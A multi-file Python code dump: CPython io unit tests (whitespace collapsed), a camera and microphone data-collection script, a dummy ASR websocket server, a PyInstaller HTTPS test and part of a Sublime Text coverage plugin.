bytearray(1024)) 
self.assertRaises(ValueError, f.readline) self.assertRaises(ValueError, f.readlines) self.assertRaises(ValueError, f.readlines, 1) self.assertRaises(ValueError, f.seek, 0) self.assertRaises(ValueError, f.tell) self.assertRaises(ValueError, f.truncate) self.assertRaises(ValueError, f.write, b"" if "b" in kwargs['mode'] else "") self.assertRaises(ValueError, f.writelines, []) self.assertRaises(ValueError, next, f) def test_blockingioerror(self): # Various BlockingIOError issues class C(str): pass c = C("") b = self.BlockingIOError(1, c) c.b = b b.c = c wr = weakref.ref(c) del c, b support.gc_collect() self.assertIsNone(wr(), wr) def test_abcs(self): # Test the visible base classes are ABCs. self.assertIsInstance(self.IOBase, abc.ABCMeta) self.assertIsInstance(self.RawIOBase, abc.ABCMeta) self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta) self.assertIsInstance(self.TextIOBase, abc.ABCMeta) def _check_abc_inheritance(self, abcmodule): with self.open(support.TESTFN, "wb", buffering=0) as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertIsInstance(f, abcmodule.RawIOBase) self.assertNotIsInstance(f, abcmodule.BufferedIOBase) self.assertNotIsInstance(f, abcmodule.TextIOBase) with self.open(support.TESTFN, "wb") as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertNotIsInstance(f, abcmodule.RawIOBase) self.assertIsInstance(f, abcmodule.BufferedIOBase) self.assertNotIsInstance(f, abcmodule.TextIOBase) with self.open(support.TESTFN, "w") as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertNotIsInstance(f, abcmodule.RawIOBase) self.assertNotIsInstance(f, abcmodule.BufferedIOBase) self.assertIsInstance(f, abcmodule.TextIOBase) def test_abc_inheritance(self): # Test implementations inherit from their respective ABCs self._check_abc_inheritance(self) def test_abc_inheritance_official(self): # Test implementations inherit from the official ABCs of the # baseline "io" module. 
self._check_abc_inheritance(io) def _check_warn_on_dealloc(self, *args, **kwargs): f = open(*args, **kwargs) r = repr(f) with self.assertWarns(ResourceWarning) as cm: f = None support.gc_collect() self.assertIn(r, str(cm.warning.args[0])) def test_warn_on_dealloc(self): self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0) self._check_warn_on_dealloc(support.TESTFN, "wb") self._check_warn_on_dealloc(support.TESTFN, "w") def _check_warn_on_dealloc_fd(self, *args, **kwargs): fds = [] def cleanup_fds(): for fd in fds: try: os.close(fd) except OSError as e: if e.errno != errno.EBADF: raise self.addCleanup(cleanup_fds) r, w = os.pipe() fds += r, w self._check_warn_on_dealloc(r, *args, **kwargs) # When using closefd=False, there's no warning r, w = os.pipe() fds += r, w with support.check_no_resource_warning(self): open(r, *args, closefd=False, **kwargs) def test_warn_on_dealloc_fd(self): self._check_warn_on_dealloc_fd("rb", buffering=0) self._check_warn_on_dealloc_fd("rb") self._check_warn_on_dealloc_fd("r") def test_pickling(self): # Pickling file objects is forbidden for kwargs in [ {"mode": "w"}, {"mode": "wb"}, {"mode": "wb", "buffering": 0}, {"mode": "r"}, {"mode": "rb"}, {"mode": "rb", "buffering": 0}, {"mode": "w+"}, {"mode": "w+b"}, {"mode": "w+b", "buffering": 0}, ]: for protocol in range(pickle.HIGHEST_PROTOCOL + 1): with self.open(support.TESTFN, **kwargs) as f: self.assertRaises(TypeError, pickle.dumps, f, protocol) def test_nonblock_pipe_write_bigbuf(self): self._test_nonblock_pipe_write(16*1024) def test_nonblock_pipe_write_smallbuf(self): self._test_nonblock_pipe_write(1024) @unittest.skipUnless(hasattr(os, 'set_blocking'), 'os.set_blocking() required for this test') def _test_nonblock_pipe_write(self, bufsize): sent = [] received = [] r, w = os.pipe() os.set_blocking(r, False) os.set_blocking(w, False) # To exercise all code paths in the C implementation we need # to play with buffer sizes. 
For instance, if we choose a # buffer size less than or equal to _PIPE_BUF (4096 on Linux) # then we will never get a partial write of the buffer. rf = self.open(r, mode='rb', closefd=True, buffering=bufsize) wf = self.open(w, mode='wb', closefd=True, buffering=bufsize) with rf, wf: for N in 9999, 73, 7574: try: i = 0 while True: msg = bytes([i % 26 + 97]) * N sent.append(msg) wf.write(msg) i += 1 except self.BlockingIOError as e: self.assertEqual(e.args[0], errno.EAGAIN) self.assertEqual(e.args[2], e.characters_written) sent[-1] = sent[-1][:e.characters_written] received.append(rf.read()) msg = b'BLOCKED' wf.write(msg) sent.append(msg) while True: try: wf.flush() break except self.BlockingIOError as e: self.assertEqual(e.args[0], errno.EAGAIN) self.assertEqual(e.args[2], e.characters_written) self.assertEqual(e.characters_written, 0) received.append(rf.read()) received += iter(rf.read, None) sent, received = b''.join(sent), b''.join(received) self.assertEqual(sent, received) self.assertTrue(wf.closed) self.assertTrue(rf.closed) def test_create_fail(self): # 'x' mode fails if file is existing with self.open(support.TESTFN, 'w'): pass self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x') def test_create_writes(self): # 'x' mode opens for writing with self.open(support.TESTFN, 'xb') as f: f.write(b"spam") with self.open(support.TESTFN, 'rb') as f: self.assertEqual(b"spam", f.read()) def test_open_allargs(self): # there used to be a buffer overflow in the parser for rawmode self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+') def test_check_encoding_errors(self): # bpo-37388: open() and TextIOWrapper must check encoding and errors # arguments in dev mode mod = self.io.__name__ filename = __file__ invalid = 'Boom, Shaka Laka, Boom!' 
code = textwrap.dedent(f''' import sys from {mod} import open, TextIOWrapper try: open({filename!r}, encoding={invalid!r}) except LookupError: pass else: sys.exit(21) try: open({filename!r}, errors={invalid!r}) except LookupError: pass else: sys.exit(22) fp = open({filename!r}, "rb") with fp: try: TextIOWrapper(fp, encoding={invalid!r}) except LookupError: pass else: sys.exit(23) try: TextIOWrapper(fp, errors={invalid!r}) except LookupError: pass else: sys.exit(24) sys.exit(10) ''') proc = assert_python_failure('-X', 'dev', '-c', code) self.assertEqual(proc.rc, 10, proc) class CMiscIOTest(MiscIOTest): io = io def test_readinto_buffer_overflow(self): # Issue #18025 class BadReader(self.io.BufferedIOBase): def read(self, n=-1): return b'x' * 10**6 bufio = BadReader() b = bytearray(2) self.assertRaises(ValueError, bufio.readinto, b) def check_daemon_threads_shutdown_deadlock(self, stream_name): # Issue #23309: deadlocks at shutdown should be avoided when a # daemon thread and the main thread both write to a file. 
code = """if 1: import sys import time import threading from test.support import SuppressCrashReport file = sys.{stream_name} def run(): while True: file.write('.') file.flush() crash = SuppressCrashReport() crash.__enter__() # don't call __exit__(): the crash occurs at Python shutdown thread = threading.Thread(target=run) thread.daemon = True thread.start() time.sleep(0.5) file.write('!') file.flush() """.format_map(locals()) res, _ = run_python_until_end("-c", code) err = res.err.decode() if res.rc != 0: # Failure: should be a fatal error pattern = (r"Fatal Python error: _enter_buffered_busy: " r"could not acquire lock " r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> " r"at interpreter shutdown, possibly due to " r"daemon threads".format_map(locals())) self.assertRegex(err, pattern) else: self.assertFalse(err.strip('.!')) def test_daemon_threads_shutdown_stdout_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stdout') def test_daemon_threads_shutdown_stderr_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stderr') class PyMiscIOTest(MiscIOTest): io = pyio @unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.') class SignalsTest(unittest.TestCase): def setUp(self): self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt) def tearDown(self): signal.signal(signal.SIGALRM, self.oldalrm) def alarm_interrupt(self, sig, frame): 1/0 def check_interrupted_write(self, item, bytes, **fdopen_kwargs): """Check that a partial write, when it gets interrupted, properly invokes the signal handler, and bubbles up the exception raised in the latter.""" read_results = [] def _read(): s = os.read(r, 1) read_results.append(s) t = threading.Thread(target=_read) t.daemon = True r, w = os.pipe() fdopen_kwargs["closefd"] = False large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1) try: wio = self.io.open(w, **fdopen_kwargs) if hasattr(signal, 'pthread_sigmask'): # create the thread with SIGALRM signal blocked 
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM]) t.start() signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM]) else: t.start() # Fill the pipe enough that the write will be blocking. # It will be interrupted by the timer armed above. Since the # other thread has read one byte, the low-level write will # return with a successful (partial) result rather than an EINTR. # The buffered IO layer must check for pending signal # handlers, which in this case will invoke alarm_interrupt(). signal.alarm(1) try: self.assertRaises(ZeroDivisionError, wio.write, large_data) finally: signal.alarm(0) t.join() # We got one byte, get another one and check that it isn't a # repeat of the first one. read_results.append(os.read(r, 1)) self.assertEqual(read_results, [bytes[0:1], bytes[1:2]]) finally: os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and block again. try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_unbuffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0) def test_interrupted_write_buffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb") def test_interrupted_write_text(self): self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii") @support.no_tracing def check_reentrant_write(self, data, **fdopen_kwargs): def on_alarm(*args): # Will be called reentrantly from the same thread wio.write(data) 1/0 signal.signal(signal.SIGALRM, on_alarm) r, w = os.pipe() wio = self.io.open(w, **fdopen_kwargs) try: signal.alarm(1) # Either the reentrant call to wio.write() fails with RuntimeError, # or the signal handler raises ZeroDivisionError. 
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm: while 1: for i in range(100): wio.write(data) wio.flush() # Make sure the buffer doesn't fill up and block further writes os.read(r, len(data) * 100) exc = cm.exception if isinstance(exc, RuntimeError): self.assertTrue(str(exc).startswith("reentrant call"), str(exc)) finally: signal.alarm(0) wio.close() os.close(r) def test_reentrant_write_buffered(self): self.check_reentrant_write(b"xy", mode="wb") def test_reentrant_write_text(self): self.check_reentrant_write("xy", mode="w", encoding="ascii") def check_interrupted_read_retry(self, decode, **fdopen_kwargs): """Check that a buffered read, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" r, w = os.pipe() fdopen_kwargs["closefd"] = False def alarm_handler(sig, frame): os.write(w, b"bar") signal.signal(signal.SIGALRM, alarm_handler) try: rio = self.io.open(r, **fdopen_kwargs) os.write(w, b"foo") signal.alarm(1) # Expected behaviour: # - first raw read() returns partial b"foo" # - second raw read() returns EINTR # - third raw read() returns b"bar" self.assertEqual(decode(rio.read(6)), "foobar") finally: signal.alarm(0) rio.close() os.close(w) os.close(r) def test_interrupted_read_retry_buffered(self): self.check_interrupted_read_retry(lambda x: x.decode('latin1'), mode="rb") def test_interrupted_read_retry_text(self): self.check_interrupted_read_retry(lambda x: x, mode="r") def check_interrupted_write_retry(self, item, **fdopen_kwargs): """Check that a buffered write, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" select = support.import_module("select") # A quantity that exceeds the buffer size of an anonymous pipe's # write end. 
N = support.PIPE_MAX_SIZE r, w = os.pipe() fdopen_kwargs["closefd"] = False # We need a separate thread to read from the pipe and allow the # write() to finish. This thread is started after the SIGALRM is # received (forcing a first EINTR in write()). read_results = [] write_finished = False error = None def _read(): try: while not write_finished: while r in select.select([r], [], [], 1.0)[0]: s = os.read(r, 1024) read_results.append(s) except BaseException as exc: nonlocal error error = exc t = threading.Thread(target=_read) t.daemon = True def alarm1(sig, frame): signal.signal(signal.SIGALRM, alarm2) signal.alarm(1) def alarm2(sig, frame): t.start() large_data = item * N signal.signal(signal.SIGALRM, alarm1) try: wio = self.io.open(w, **fdopen_kwargs) signal.alarm(1) # Expected behaviour: # - first raw write() is partial (because of the limited pipe buffer # and the first alarm) # - second raw write() returns EINTR (because of the second alarm) # - subsequent write()s are successful (either partial or complete) written = wio.write(large_data) self.assertEqual(N, written) wio.flush() write_finished = True t.join() self.assertIsNone(error) self.assertEqual(N, sum(len(x) for x in read_results)) finally: signal.alarm(0) write_finished = True os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and could block (in case of failure). try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_retry_buffered(self): self.check_interrupted_write_retry(b"x", mode="wb") def test_interrupted_write_retry_text(self): self.check_interrupted_write_retry("x", mode="w", encoding="latin1") class CSignalsTest(SignalsTest): io = io class PySignalsTest(SignalsTest): io = pyio # Handling reentrancy issues would slow down _pyio even more, so the # tests are disabled. 
test_reentrant_write_buffered = None test_reentrant_write_text = None def load_tests(*args): tests = (CIOTest, PyIOTest, APIMismatchTest, CBufferedReaderTest, PyBufferedReaderTest, CBufferedWriterTest, PyBufferedWriterTest, CBufferedRWPairTest, PyBufferedRWPairTest, CBufferedRandomTest, PyBufferedRandomTest, StatefulIncrementalDecoderTest, CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest, CTextIOWrapperTest, PyTextIOWrapperTest, CMiscIOTest, PyMiscIOTest, CSignalsTest, PySignalsTest, ) # Put the namespaces of the IO module we are testing and some useful mock # classes in the __dict__ of each test. mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO, MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead, SlowFlushRawIO) all_members = io.__all__ + ["IncrementalNewlineDecoder"] c_io_ns = {name : getattr(io, name) for name in all_members} py_io_ns = {name : getattr(pyio, name) for name in all_members} globs = globals() c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks) py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks) # Avoid turning open into a bound method. py_io_ns["open"] = pyio.OpenWrapper for test in tests: if test.__name__.startswith("C"): for name, obj in c_io_ns.items(): setattr(test, name, obj) elif test.__name__.startswith("Py"): for name, obj in py_io_ns.items(): setattr(test, name, obj) suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests]) return suite if __name__ == "__main__": unittest.main()
# ========================= Data_Collection_2.py =========================
import cv2
import imageio
import pyrealsense2 as rs
import os
import shutil
import datetime
import pyaudio
import http.client
import io
import numpy as np
import json
import zlib
import base64
import threading
import wave
import pygame as pg
import time


class CollectData:
    """Synchronised audio/vision capture helper.

    Plays a probe sound locally while fetching a microphone-array recording
    from a remote ReSpeaker HTTP server, and grabs aligned RGB frames from an
    Intel RealSense camera. Outputs are written under ``../Sample_9/``.
    """

    def __init__(self):
        # Timestamps for one capture cycle:
        #   'a' -> when the probe sound was emitted (set by emitsound)
        #   'b' -> when the recording was saved (set by recording)
        self.dct = {'a': 0, 'b': 0}

    def woofer(self):
        """Play the sub-woofer sample on the left speaker channel only."""
        pg.mixer.init(frequency=44100, size=-16, channels=2, buffer=512)
        sound1 = pg.mixer.Sound('sub_woofer_3.wav')
        channel1 = sound1.play()
        channel1.set_volume(0.9, 0.0)

    def camera(self, fileprefix):
        """Capture one depth-aligned RGB frame from the RealSense camera and
        save it as ``../Sample_9/Images/<fileprefix>.png``.

        The pipeline is always stopped, even if frame acquisition fails.
        """
        pipeline = rs.pipeline()
        config = rs.config()
        config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)
        config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)
        profile = pipeline.start(config)
        depth_sensor = profile.get_device().first_depth_sensor()
        depth_sensor.set_option(rs.option.visual_preset, 3)  # Set high accuracy for depth sensor
        depth_scale = depth_sensor.get_depth_scale()
        clipping_distance_in_meters = 1
        clipping_distance = clipping_distance_in_meters / depth_scale
        align_to = rs.stream.color
        align = rs.align(align_to)
        try:
            frames = pipeline.wait_for_frames()
            aligned_frames = align.process(frames)
            aligned_depth_frame = aligned_frames.get_depth_frame()
            color_frame = aligned_frames.get_color_frame()
            if not aligned_depth_frame or not color_frame:
                raise RuntimeError("Could not acquire depth or color frames.")
            depth_image = np.asanyarray(aligned_depth_frame.get_data())
            color_image = np.asanyarray(color_frame.get_data())
            grey_color = 153
            depth_image_3d = np.dstack(
                (depth_image, depth_image, depth_image)
            )  # Depth image is 1 channel, color is 3 channels
            # NOTE(review): bg_removed is computed but not saved anywhere —
            # presumably left over from the depth-clipping experiment below.
            bg_removed = np.where(
                (depth_image_3d > clipping_distance) | (depth_image_3d <= 0),
                grey_color,
                color_image,
            )
            color_image = color_image[..., ::-1]  # BGR (RealSense) -> RGB (imageio)
            # depth_path = '../Sample_8/Images/Depth/%s.png' % fileprefix
            rgb_path = '../Sample_9/Images/%s.png' % fileprefix
            # imageio.imwrite(depth_path, depth_image)
            imageio.imwrite(rgb_path, color_image)
        finally:
            pipeline.stop()
        # return color_image, depth_image

    def emitsound(self):
        """After a 1 s delay, play the probe tone on the right channel only
        and record the emission timestamp in ``self.dct['a']``."""
        time.sleep(1)
        pg.mixer.init(frequency=44100, size=-16, channels=2, buffer=512)
        sound0 = pg.mixer.Sound('emit_sound_single_frequency.wav')
        channel0 = sound0.play()
        channel0.set_volume(0.0, 1.0)
        self.dct['a'] = datetime.datetime.now()
        # print("Emit Sound is running at : ", datetime.datetime.now())

    def recording(self, fileprefix):
        """Fetch the 6-channel audio capture from the ReSpeaker HTTP server,
        decode it (base64 + zlib -> int16 samples) and save it as
        ``../Sample_9/Recording/<fileprefix>.npy``.

        The connection is closed even if the request fails. Completion time
        is recorded in ``self.dct['b']``.
        """
        # The server file will be running on respeaker which should be pinged
        # from here and return us the audio output of 6 arrays.
        conn = http.client.HTTPConnection('172.31.37.131', 8882)
        try:
            conn.request("GET", "/file")
            response = conn.getresponse()
            print(response.status, response.reason)
            data = response.read()
        finally:
            conn.close()
        data2 = base64.b64decode(data)
        data2 = zlib.decompress(data2)
        fdata = np.frombuffer(data2, dtype=np.int16)
        with open('../Sample_9/Recording/%s.npy' % fileprefix, 'wb') as f:
            np.save(f, fdata)
        self.dct['b'] = datetime.datetime.now()

    def simul_thread(self, fileprefix):
        """Run recording() and emitsound() concurrently and wait for both."""
        threads = [
            threading.Thread(target=self.recording, args=(fileprefix,)),
            threading.Thread(target=self.emitsound),
        ]
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
# ============================== server.py ==============================
import json
import logging
import os
import random
import string
import threading
import time
from datetime import datetime
from logging.handlers import TimedRotatingFileHandler

import click
import tornado.ioloop
import tornado.websocket

# Log to a daily-rotated file (30 days kept) and to the console.
os.makedirs('./logs', exist_ok=True)
logging.basicConfig(format='%(asctime)s %(module)s %(levelname)s : %(message)s',
                    level=logging.INFO,
                    handlers=[
                        TimedRotatingFileHandler("logs/log.txt", when='D', backupCount=30),
                        logging.StreamHandler()
                    ])

# All currently-open DummyASRWebSocket connections.
sockets = []
_socket_index = 0


def get_sock_index():
    """Return a monotonically increasing id for each new connection.

    NOTE(review): not thread-safe, but tornado handler callbacks all run on
    the IOLoop thread, so that is fine here.
    """
    global _socket_index
    sock_index = _socket_index
    _socket_index = _socket_index + 1
    return sock_index


class EchoWebSocket(tornado.websocket.WebSocketHandler):
    """Trivial handler: replies to every message with the current UTC time."""

    def open(self):
        logging.info("WebSocket opened")

    def on_message(self, message):
        logging.info("on_message: message length %s" % len(message))
        utc_now = datetime.utcnow().isoformat()
        logging.info("Sending %s ..." % utc_now)
        self.write_message(utc_now)

    def on_close(self):
        logging.info("WebSocket closed")


class DummyASRWebSocket(tornado.websocket.WebSocketHandler):
    """Fake ASR engine: after a start-of-stream byte, periodically pushes
    random partial/full recognition results to the client."""

    SLEEP_INTERVAL = 3    # seconds between pushed results
    PARTIAL_INTERVAL = 3  # number of results per utterance (last one is 'asrfull')

    def __init__(self, application, request, **kwargs):
        super().__init__(application, request, **kwargs)
        self.start_transmission = False
        self.utt_id = 0
        self.transmission_thread = threading.Thread(target=self._run)

    def open(self):
        sockets.append(self)
        self.sock_index = get_sock_index()
        logging.info("[Sock %s] DummyASRWebSocket opened" % self.sock_index)

    def on_message(self, message):
        if isinstance(message, str):
            logging.info("[Sock %s] Message received: %s" % (self.sock_index, message))
        else:
            logging.info("[Sock %s] Message received" % (self.sock_index, ))
        # following protocol of ASR engine
        # 1 byte value of '0' indicates start of stream
        # 1 byte value of '1' indicates end of stream
        if isinstance(message, bytes) and len(message) == 1:
            if message[0] == 0:
                logging.info('[Sock %s] Start stream' % self.sock_index)
                self.start_transmission = True
            if message[0] == 1:
                logging.info('[Sock %s] Ending stream' % self.sock_index)
                self.close()
                # self.close does not call on_close callback
                self.on_close()
        elif self.start_transmission and not self.transmission_thread.is_alive():
            self.transmission_thread = threading.Thread(target=self._run)
            self.transmission_thread.start()

    def on_close(self):
        # Idempotent: this may be invoked both manually from on_message and
        # again by tornado when the close handshake completes; previously the
        # second call made sockets.remove() raise ValueError.
        if self not in sockets:
            return
        sockets.remove(self)
        logging.info("[Sock %s] Removed sock %s from socket list" % (self.sock_index, self.sock_index))
        logging.info("[Sock %s] DummyASRWebSocket closed" % self.sock_index)

    def _run(self):
        """Push PARTIAL_INTERVAL results for one utterance. RUNS IN A THREAD."""
        logging.info("[Sock %s] Starting transmission for utt_id %s" % (self.sock_index, self.utt_id))
        for i in range(self.PARTIAL_INTERVAL):
            response = {}
            response['uttID'] = self.utt_id
            # return random combination of strings and digits
            # https://stackoverflow.com/questions/2257441/random-string-generation-with-upper-case-letters-and-digits
            random_str = ''.join(random.choices(string.ascii_uppercase + string.digits, k=3))
            response['result'] = f"{self.utt_id}_{i}_{random_str}"
            if i == self.PARTIAL_INTERVAL - 1:
                # Final result of the utterance; advance to the next utt_id.
                response['cmd'] = 'asrfull'
                self.utt_id = self.utt_id + 1
            else:
                response['cmd'] = 'asrpartial'
            try:
                self.write_message(response)
                logging.info("[Sock %s] Sent result: %s" % (self.sock_index, response))
                time.sleep(self.SLEEP_INTERVAL)
            except tornado.websocket.WebSocketClosedError as e:
                logging.error(
                    "[Sock %s] Websocket already closed." % self.sock_index)


def make_app():
    """Build the tornado application with the two websocket endpoints."""
    return tornado.web.Application([
        (r"/", DummyASRWebSocket),
        (r"/echo", EchoWebSocket)
    ])


@click.command()
@click.option('--port', '-p', default=5000)
def main(port: int):
    # reference: https://gist.github.com/timsavage/d412d9e321e9f6d358abb335c8d41c63
    app = make_app()
    app.listen(port)
    logging.info("Starting websocket server on port %s" % port)
    tornado.ioloop.IOLoop.current().start()


if __name__ == "__main__":
    main()
pyi_lib_requests.py
# -----------------------------------------------------------------------------
# Copyright (c) 2014-2021, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
# -----------------------------------------------------------------------------

# Functional test: start a local HTTPS server and fetch a page from it with
# `requests`, both inside and outside a PyInstaller bundle.

import socket

# Python 2 / Python 3 compatibility shim for the HTTP server modules.
try:
    import BaseHTTPServer
    import SimpleHTTPServer
except ImportError:
    import http.server as BaseHTTPServer
    import http.server as SimpleHTTPServer

import os
import ssl
import sys
import threading
import time

import requests

"""
Note: to re-create the server.pem file use the following commands:

cd /path/to/pyinstaller.git/tests/functional
openssl req -new -x509 -keyout data/requests/server.pem \
    -text -out data/requests/server.pem -days 36500 \
    -nodes -config data/requests/openssl.conf
"""

if getattr(sys, 'frozen', False):
    # We are running in a |PyInstaller| bundle.
    basedir = sys._MEIPASS
else:
    # We are running in a normal Python environment.
    basedir = os.path.dirname(__file__)

# Self-signed certificate bundled next to the script / inside the bundle.
SERVER_CERT = os.path.join(basedir, "server.pem")
if not os.path.exists(SERVER_CERT):
    raise SystemExit('Certificate-File %s is missing' % SERVER_CERT)


def main():
    """Bind an HTTPS server on the first free port in [8443, 8493), then
    verify that `requests` can fetch a page from it over TLS."""
    SERVER_PORT = 8443
    httpd = None
    # Since unit tests run in parallel, the port may be in use, so retry creating the server while incrementing
    # the port number.
    while SERVER_PORT < 8493:  # Max 50 retries
        try:
            # SSL server copied from here: http://www.piware.de/2011/01/creating-an-https-server-in-python/
            httpd = BaseHTTPServer.HTTPServer(('localhost', SERVER_PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
        except socket.error as e:
            if e.errno == 98:  # Address in use
                SERVER_PORT += 1
                continue
            else:
                # Some other socket.error
                raise
        else:
            # Success
            break
    else:
        # Did not break from loop, so we ran out of retries
        assert False, "Could not bind server port: all ports in use."

    # NOTE(review): ssl.wrap_socket is deprecated and removed in Python 3.12;
    # modern code would use ssl.SSLContext.wrap_socket — confirm target
    # Python versions before changing this vendored test.
    httpd.socket = ssl.wrap_socket(httpd.socket, certfile=SERVER_CERT, server_side=True)

    def ssl_server():
        httpd.serve_forever()

    # Start the SSL server
    thread = threading.Thread(target=ssl_server)
    thread.daemon = True
    thread.start()

    # Wait a bit for the server to start
    time.sleep(1)

    # Use requests to get a page from the server
    requests.get("https://localhost:{}".format(SERVER_PORT), verify=SERVER_CERT)
    # requests.get("https://github.com")


if __name__ == '__main__':
    main()
package_coverage.py
# coding: utf-8 from __future__ import unicode_literals, division, absolute_import, print_function import sys import os import re import threading import imp import time import unittest import sublime import sublime_plugin import coverage import coverage.files import shellenv import sqlite3 import subprocess import webbrowser import shutil import inspect from datetime import datetime from textwrap import dedent if sys.platform == 'win32': from ctypes import windll, create_unicode_buffer if sys.version_info >= (3,): from io import StringIO from imp import reload else: from cStringIO import StringIO __version__ = '1.1.1' __version_info__ = (1, 1, 1) class PackageCoverageExecCommand(sublime_plugin.WindowCommand): """ Runs the tests for a package and displays the output in an output panel """ def run(self, do_coverage=False, ui_thread=False, html_report=False, by_name=False): testable_packages = find_testable_packages() if not testable_packages: sublime.error_message(format_message(''' Package Coverage No testable packages could be found ''')) return settings = sublime.load_settings('Package Coverage.sublime-settings') self.coverage_database = get_setting(self.window, settings, 'coverage_database') self.do_coverage = do_coverage self.ui_thread = ui_thread self.html_report = html_report self.packages = testable_packages self.by_name = by_name self.name_pattern = None self.window.show_quick_panel(testable_packages, self.on_done) def on_done(self, index): """ User input handler for selecting the package to run the tests for :param index: An integer - will be -1 if user cancelled selection, otherwise will be the index of the package name in the self.packages list """ if index == -1: return self.package_name = self.packages[index] if not self.by_name: return self.run_tests() self.prompt_name_pattern() def prompt_name_pattern(self, initial=''): def handle_pattern(pattern): try: self.name_pattern = re.compile(pattern) self.run_tests() except (re.error): 
sublime.error_message(format_message(''' Package Coverage The pattern entered could not be compiled as a regular expression ''')) self.prompt_name_pattern(pattern) self.window.show_input_panel( 'Name Regex', initial, handle_pattern, None, None ) def run_tests(self): package_name = self.package_name package_dir = os.path.join(sublime.packages_path(), package_name) db_results_file = None if self.do_coverage: include_dir = os.path.join(package_dir, '*.py') omit_dir = os.path.join(package_dir, 'dev', '*.py') if sys.platform == 'win32': short_include_dir = create_short_path(os.path.dirname(include_dir)) if short_include_dir: include_dir = [include_dir, os.path.join(short_include_dir, '*.py')] short_omit_dir = create_short_path(os.path.dirname(omit_dir)) if short_omit_dir: omit_dir = [omit_dir, os.path.join(short_omit_dir, '*.py')] # Depending on the folder launched from with ST2 on Linux, the current # folder seems to have a big impact on how coverage selects code to # measure, and can even lead to measuring stdlib code, but then producing # errors when it can not find the source to said stdlib files. To work # around this, we explicitly enumerate every .py file in the package and # pass then all via include_dir. elif sys.platform not in set(['win32', 'darwin']) and sys.version_info < (3,): include_dir = [] for root, dir_names, file_names in os.walk(package_dir): for file_name in file_names: if not file_name.endswith('.py'): continue include_dir.append(os.path.join(root, file_name)) cov = coverage.Coverage(include=include_dir, omit=omit_dir) cov.start() db_results_file = StringIO() title = 'Measuring %s Coverage' % package_name else: title = 'Running %s Tests' % package_name tests_module, panel = create_resources(self.window, package_name, package_dir) panel_queue = StringQueue() def show_output_panel(): self.window.run_command('show_panel', {'panel': 'output.%s_tests' % package_name}) show_output_panel() # Variables shared between the two threads. 
There is no locking here # since the two threads strictly run one after the other. Would use # nonlocal here if we didn't have to support Python 2.6. thread_vars = { 'all_short': None, 'short_package_dir': None, 'cov_data': None } def done_displaying_results(): sublime.set_timeout(show_output_panel, 10) if self.do_coverage and self.coverage_database: try: is_clean = is_git_clean(package_dir) except (OSError) as e: print(format_message(''' Package Coverage: not saving results to coverage database since an error occurred fetching the git status: %s ''', e.args[0])) return if not is_clean: print(format_message(''' Package Coverage: not saving results to coverage database since git repository has modified files ''')) return commit_hash, commit_date, summary = git_commit_info(package_dir) data_file = StringIO() thread_vars['cov_data'].write_fileobj(data_file) data_bytes = data_file.getvalue() platform = { 'win32': 'windows', 'darwin': 'osx' }.get(sys.platform, 'linux') python_version = '%s.%s' % sys.version_info[0:2] if thread_vars['all_short']: path_prefix = thread_vars['short_package_dir'] + os.sep else: path_prefix = package_dir + os.sep output = db_results_file.getvalue() connection = open_database(self.coverage_database) cursor = connection.cursor() cursor.execute(""" INSERT INTO coverage_results ( project, commit_hash, commit_summary, commit_date, data, platform, python_version, path_prefix, output ) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ? 
